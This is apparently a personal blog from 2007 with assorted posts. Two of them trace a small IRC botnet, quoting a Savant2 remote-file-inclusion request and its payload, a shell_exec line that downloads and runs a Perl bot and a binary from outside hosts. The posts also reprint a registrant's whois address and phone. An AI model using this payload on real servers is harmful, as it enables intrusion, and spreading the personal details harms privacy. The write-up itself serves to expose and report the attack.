B10[mg]

After doing my homework for my Indonesian language course, I wondered if there was a module already that would transform numbers in the right written Indonesian equivalent. For instance, 10 would return sepuluh (= ten).

Of course it already exists and once again I didn't get to write a module for it. Instead, I wrote my little extra homework generator for it, being Latihan Angka 1, and Latihan Angka 2.

(for those curious, Latihan Angka means Number Practice)

Terima kasih, Steven Haryanto!

perl, bahasa indonesia, latihan, angka

As mentioned before I've been obsessed with stopping botnets. Well, this one, operated by a script kiddie named "fazanul".

Today I've seen his attack on my machine again. And, after sending the usual abuse emails, I've decided to have a little chat with him. As I feared, this is the ultimate script kiddie. But first, a little about his latest "attack".

The attack this time was launched using a new host:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://fazanul.com/c.txt? HTTP/1.1

Fazanul.com? Interesting! This kiddie was stupid enough to register a domain. He's, however, still abusing the Savant2 hole. So who's behind fazanul.com?

$ gwhois fazanul.com
[...]
Domain Name.......... fazanul.com
  Creation Date........ 2007-01-23
  Registration Date.... 2007-01-23
  Expiry Date.......... 2008-01-23
  Organisation Name.... Stanley Livingston
  Organisation Address. 455 Rose Quartz Place
  Organisation Address. 
  Organisation Address. Castle Rock
  Organisation Address. 80108
  Organisation Address. CO
  Organisation Address. UNITED STATES

Admin Name........... Stanley Livingston
  Admin Address........ 455 Rose Quartz Place
  Admin Address........ 
  Admin Address........ Castle Rock
  Admin Address........ 80108
  Admin Address........ CO
  Admin Address........ UNITED STATES
  Admin Email.......... fazanul5004@yahoo.com
  Admin Phone.......... +1.9094813680
  Admin Fax............ 

Tech Name............ YahooDomains TechContact
  Tech Address......... 701 First Ave.
  Tech Address......... 
  Tech Address......... Sunnyvale
  Tech Address......... 94089
  Tech Address......... CA
  Tech Address......... UNITED STATES
  Tech Email........... domain.tech@YAHOO-INC.COM
  Tech Phone........... +1.6198813096
  Tech Fax............. 
  Name Server.......... yns1.yahoo.com
  Name Server.......... yns2.yahoo.com

You've got to be kidding me! He registered it today! And look at that, we have fazanul5004@yahoo.com, and it looks like Yahoo is hosting this domain.

$ host fazanul.com
fazanul.com has address 68.142.212.125
fazanul.com has address 68.142.212.126
fazanul.com has address 68.142.212.127
fazanul.com has address 68.142.212.128
fazanul.com has address 68.142.212.129
fazanul.com has address 68.142.212.130
fazanul.com mail is handled by 20 mx1.biz.mail.yahoo.com.
fazanul.com mail is handled by 30 mx5.biz.mail.yahoo.com.

Ugh, yeah, the files are even hosted by Yahoo (the IPs belong to Yahoo). So those should be gone within 48 hours ;-)

So, now that we've found his domain, let's have a little chat with him. He chose Bucharest.RO.EU.Ultra-Chat.Org again as command center, yet this time the channel #out. Let's login, and why not use the nickname Sorin (remember? ;-)

Here's what happened... enjoy (the red comments are added by me later)

<Sorin> Fazanul!
<Sorin> You're back :-)
<Sorin> Let's see how long fazanul.com will last
<fazanul> ??
<fazanul> what?
<Sorin> I've killed your MUIE botnet before ... and another one after that I
          believe ...
<Sorin> let's see how long it'll take to kill this botnet
<Sorin> But ermm, registering your domain @ yahoo?!? Are you crazy man?
<fazanul> nop
<fazanul> haking host
<Sorin> Ok ... well, let's see how long these drones here will last
<Sorin> Oh you now hack domain registry servers?
<fazanul> yeah
<Sorin> Ah ok ... somehow I have a hard time believing you. Your botnet Perl
          scripts look like crappy cut'n'paste jobs, not showing too much
          knowledge and full of script kiddie fingerprints ...
<fazanul> i have haking host and redirect and domains
<Sorin> fazanul.com has address 68.142.212.128
<fazanul> domains by yahooo
<Sorin> The whois points to yahoo, the IP points to yahoo ... so you hack
          Yahoo's Domain Registry service. Sweet
<fazanul> lollll

Yeah right ... he's registering domains through Yahoo himself now?

<Sorin> anyways, let's see how long it'll be up.
<fazanul> ok man 
<fazanul> part
<fazanul> by channels
<fazanul> i have work
<Sorin> Can't you ban me? Like usually? ;-)
<fazanul> nop
<fazanul> part you
<Sorin> Oh well, will see your next "attack" ... and remember I'll stop those
          too ;-P
<Sorin> #muie is awfully empty ...
<fazanul> yeah
<fazanul> stop

Did he just ask me to *stop* attacking his botnets?!?

<Sorin> Why? You attack my machine, I attack you. Too bad I'm a little more
          successful
<fazanul> what machine you?
<Sorin> Oh come on ... I won't tell you. That's spoiling the fun. I don't
          know your next move, you don't know my host
<fazanul> ntroduction
<fazanul> E-mail for several domains are handled by mail.b10m.net
          <212.238.141.98>, most likely the domain you've tried to reach
          too.
[snipped more info from mail.b10m.net here]

I logged in the IRC channel, from this machine (mail.b10m.net). 
He was clever enough to look that up. Unfortunately for him, 
the attacks are *not* launched on this vhost ;-)

Anyways, now we know *his* IP address: 

212.138.64.171 - - [22/Jan/2007:23:36:54 +0100] "GET / HTTP/1.0" 200 3240 
"-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.9) 
Gecko/20061206 Firefox/1.5.0.9"


<fazanul> ....
<fazanul> understand
<Sorin> Oh, you got me there.
<Sorin> Darn it
<fazanul> -mail for several domains are handled by mail.b10m.net
          <212.238.141.98>
<fazanul> :))))
<fazanul> hashahahahaha

Funny, he actually pointed me out to a typo. That IP address *used* to be my 
IP address. Nowadays I have 217.19.21.103...

<Sorin> Ah yes ... oh well, I talk to you later then
<fazanul> to believe
<Sorin> You're too smart for me
<fazanul> :))))))))

SignOff: Sorin (fazanul ... the ultimate script kiddie)

Let's see how long this new botnet will last ... and let's see when I will meet my buddy fazaNULL again :-)

Update (2007/01/24): poor, poor fazanul. After receiving a canned reply from Yahoo abuse, in which they really shared my pain of receiving spam, but the message really didn't originate at a Yahoo mail server (what message again?), they did act on this domain:

$ HEAD http://fazanul.com/c.txt
503 Service Temporarily Unavailable
[...]
X-Host: p10w8.geo.mud.yahoo.com
X-INKT-SITE: http://us.geocities.com/server-errors
X-INKT-URI: http://us.geocities.com/server-errors/pd_disabled.html

And sure enough, http://fazanul.com/ is pretty obvious:

Site Temporarily Disabled

This site has been temporarily disabled. If you are the owner of the site, please contact customer care.

Mission accomplished ... again ;-)

fazanul, botnet, script kiddie

Looking at your Apache logfiles can be fun. A lot of annoying people try to do all kinds of crazy stuff. Today I noticed this GET request:

GET /p/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?
  + mosConfig_absolute_path=http://electrafusion.com/c.txt?? 
  + HTTP/1.1

Since I'm not a fan of PHP, chances are I don't have this file. And yup, I was correct. I didn't have that file. But the URI in there made me curious. What is that c.txt doing exactly?

<?
shell_exec('cd /tmp;wget http://electrafusion.com/botek.txt;
   + mv botek.txt .sessx;perl .sessx;rm botek.txt.*;
   + wget http://saids.com/a;chmod +x a;
   + mv a sess_vttn737j6k0mci66akhs5u1261;
   + ./sess_vttn737j6k0mci66akhs5u1261;
   + rm a*');
...
?>

Ah! Nice. Go to /tmp, download botek.txt from the same server (see below), move that file to .sessx and execute it. Then delete the botek.txt file, get yet another file (now from saids.com, but a non-existing file...) execute that too and delete everything.

The script is a little longer, but basically it's trying various ways to get and launch these additional files.

So what does botek.txt exactly do? It opens an IRC connection a Bucharest.RO.EU.Ultra-Chat.Org. On that server (83.170.75.108), it joins the channel #muie and starts listening for commands from two nicknames (fazanul and Sorin ... our 1337 script kiddie). This in fact is rather dangerous. I doubt this botnet will be tremendously big, yet of course this "über hacker" will keep a list of vulnerable hosts. (To you system admins: check if your Savant2_Plugin_textarea.php is vulnerable!).

I found a real easy way to get protected agains these a**h*les though. Just login to the IRC server, join #muie with a nickname like MUIE|X|\d+ (where \d+ is a random number ;-) and mock this script kiddie' Perl knowledge. Call him script kiddie and they'll ban your IP within a minute. Woohoo! Now my server is safe from them, for my server can't login to the channel ;)

Anyways, after spending some time in the channel, I noticed quite a few of vulnerable hosts already as this picture shows:

Sad but true ...

So who's hosting these files?

$ host electrafusion.com
electrafusion.com has address 208.179.58.67
electrafusion.com mail is handled by 10 electrafusion.com.

$ gwhois 208.179.58.67
Process query: '208.179.58.67'
[...]
OrgName:    Tierzero 
OrgID:      TIERZ
Address:    700 Wilshire Blvd.
Address:    Suite 600
City:       Los Angeles
StateProv:  CA
PostalCode: 90017
Country:    US
[...]
OrgTechHandle: TECHT-ARIN
OrgTechName:   TECH-TIERZERO 
OrgTechPhone:  +1-213-284-0555
OrgTechEmail:  ipnetworkops@tierzero.net
[...]

Start complaining! ;-) I already contacted TierZero, yet I haven't received any replies, and the files are still online :-(

The most ironic thing about this script kiddie is actually the last line of the botek.txt:

# NOTE: DONT REMOVE COPYRIGHTS

Update: TierZero did act on this botnet now:

PING electrafusion.com (208.179.58.67): 56 data bytes
36 bytes from hoanet-gw.dcap1.lax.us.tierzero.net (208.179.32.130): 
Communication prohibited by filter
Vr HL TOS  Len   ID Flg  off TTL Pro  cks      Src      Dst
 4  5  00 5400 a156   0 0000  38  01 b149 xxx.xxx.xxx.xxx  208.179.58.67 

--- electrafusion.com ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

Of course I had to tell this Sorin about this news and this is what our conversation was like:

Sorin: w
... thinking I was a zombie, he wanted to see who was online

Me: hahaha where did electrafusion.com go? ;-P
Sorin: bitch

Update: As expected, the script kiddie found a new webserver to download the bot scripts from: http://www.depdiknas.go.id/c.txt

The domain resolves to 222.124.249.2, which belongs to TELKOMNET. abuse@telkom.net.id has been informed and hopefully will respond fast.

I figured I'd also might be able to get the IRC server gone:

$ host Bucharest.RO.EU.Ultra-Chat.Org
Bucharest.RO.EU.Ultra-Chat.Org has address 83.170.75.108

$ gwhois 83.170.75.108
Process query: '83.170.75.108'
[...]
% Information related to '83.170.64.0 - 83.170.79.255'

inetnum:        83.170.64.0 - 83.170.79.255
netname:        UK2-NET
descr:          UK2.NET - UK's biggest host
country:        GB
admin-c:        BB963-RIPE
tech-c:         BB963-RIPE
rev-srv:        ns1.uk2.net
rev-srv:        ns2.uk2.net
status:         ASSIGNED PA
mnt-by:         AS13213-MNT
source:         RIPE # Filtered
[...]

This ISP has also been informed.

Update (2007/01/12): The botnet seems to have crumbled! Woohoo!

$ lwp-request -m HEAD http://www.depdiknas.go.id/c.txt
403 Forbidden
[...]

Now that the initial script cannot be called anymore, let's see what we have in our beloved #muie channel:



There's but 2 "users" in there (yes, antimuie is me ;-). Even the fanazul and Sorin nicks are no longer logged in.

Victory!

botnet, savant2, exploit, sorin, fazanul, botek.txt, muie, tierzero, uk2.net telkomnet

In the WebWereld article I was dubbed "Dutch Hacker". The first thing my wife said after reading the article was "Wow, I'm married to a hacker!". That and my new job made her give me an iPod Nano (for I travel to work by train now).

After picking up the iPod Nano, I went to look how to work with it. First, I hooked it up to a Windows Laptop and was planning to use the official way, through iTunes Unfortunately, this application seemed too hard for me. I messed with it for a while, but I really couldn't figure out how to use it. It's just too hard!

So I went for the preferred syncing method, through my own Linux box. I plugged the USB cable in and my OS recognized it straight away. What a relief! So it was time to give gtkpod a go. Too bad it was like iTunes: too hard for me to grasp (I still really have no clue how those two programs work!).

But thank god there were some Perl tools, called gnupod. Easy to use tools, good documentation, and I can finally put my noise on my iPod!

gnupod, gtkpod, linux, iPod Nano

A little while ago I posted a little something on my iPod and Linux. After some time I noticed a weird referer in my log files (by now you should be aware that I occasionally scan my logs for odd entries ;-)

The referer pointed me to a weird site. I've seen this script (used at infobloggs.com) before and it's basically a horrible PHP script, stealing content from other sites to push the owner's own site(s).

As you can see, the text is copied verbatim and a link to 7daycloser.com is appended (I don't see the correlation between Linux, iPod and selling homes neither ... iPods are not that expensive).

Of course I was not happy with this. If someone copies my text, I expect them to at least tell where they found it. So I contacted the server hosting infobloggs.com, SiteGround LLC. I was fairly sure this company would act on this kind of lame theft, for they have a copyright notice, as well as a anti spam policy posted on their site.

Unfortunately, SiteGround LLC's abuse desk seems to care about a few bucks made on selling an account more than obeying to their own terms, for this is what I received from them:

To help us prevent any copyrights infringement and in accordance with the Digital Millenium Copyright Act, please provide us with the following information:

1. A physical or electronic signature of the copyright owner or authorized agent;
2. Identification of the copyrighted work(s) claimed to have been infringed (please provide us with a copyright certificate if available);
3. Identification of the material that is claimed to be infringing or to be the subject of the infringing activity and information reasonably sufficient to permit us to locate the material (please provide us the URL of the infringing material);
4. Information regarding how we may contact you (for example, mailing address, telephone number, E-mail address);
5. A statement that the copyright owner or its authorized agent has a good faith belief that use of the material in the manner complained of is not authorized by the copyright owner, its agent, or the law: "I have a good faith belief that the use of the material in the manner complained of is not authorized by the copyright owner, its agent, or the law."
6. A statement that the information in the notification is accurate, and made under penalty of perjury, and, if an agent is providing the notification, a statement that the agent is authorized to act on behalf of the owner of an exclusive right that is allegedly infringed: "Under the penalty of perjury I state that the information contained in my complaint is accurate and I am authorized to act on behalf of the owner of the copyright I claim is infringed."

So I provided them with everything they so needed to stop content stealing thugs, yet it was not enough. They needed more:

However in order to proceed with your request we will need the certificate of copyrights provided or court decision stating that our client is not allowed to use the materials in question. Please note that such a disputes are generally solved by the court where the web hosting company is not a party.

Clearly they don't care about spammers on their servers and try to get rid of me again. Of course I'm not going to court over this. I was hoping on a good abuse desk, yet Larry Thompson (Abuse Department) was clearly not interested in helping and stopping abuse.

I tried to clarify a few things to Larry:

The hosting company may not usually be a party here, yet since your company hosts the domain, and is owner of the domain, I take you accountable for this domain and thus for the stealing of content.

But since your company clearly doesn't mind this kind of behavior, I'd like to ask for your permission to publish our email conversation online, for the rest of the world to see. Taken the reaction into account regarding content theft, I doubt you morally (can) refuse this.

Larry refused to reply to this, so I take it I have his permission. Otherwise, sue me in a Dutch court for defamation!

siteground, spam, content theft, copyright

I barely watch TV, but sometimes I like to zap my way through the channels. Today I decided to see what was on and after a while, I noticed this screen:

Unfortunately, I have no clue what channel this is, but based on the position (channel 28) I bet it's one of the local channels.

A little online searching led me a website telling a little about "NewsCast.exe". I assume they sell the software (it's not clear on the site). Based on the horrific layout of the website, I have no reason to doubt they are the ones responsible for the crash ;-)

(the website isn't interesting enough to translate. Roughly they claim the software is for anyone who wants to broadcast professionally. It's some kind of news system, somewhat similar to TeleText)

I'll update this post if I find out what channel it is that's crashing my tv! (If I don't forget, and care enough ;-)

tv, newscast

KPN is a Dutch phone company that still, more or less, has a monopoly on the landlines. They feel heat of the whole VoIP movement and try eagerly to keep their customers. Unfortunately, they now chose for an opt-out technique.

Last week, they deemed it necessary to write me a letter to inform me that they were launching a new product, meaning free calls in the weekend. Of course I had to pay a little more, monthly, but I didn't have to do anything to get this new deal! Wow, great service!

Oh, if I didn't want it, I'd have to return a card with date and signature, which of course I did.

Now what if I didn't receive that letter? A lot of mail mysteriously disappears, every year. Ugh, I hate opt-out stuff like this. I do not want something new, and if I do, I'll ask for it.

Expect a command line Perl script soon for accessing VoipBuster. After this trick, I will call even less through KPN. Shame on you!

kpn, voipbuster, opt-out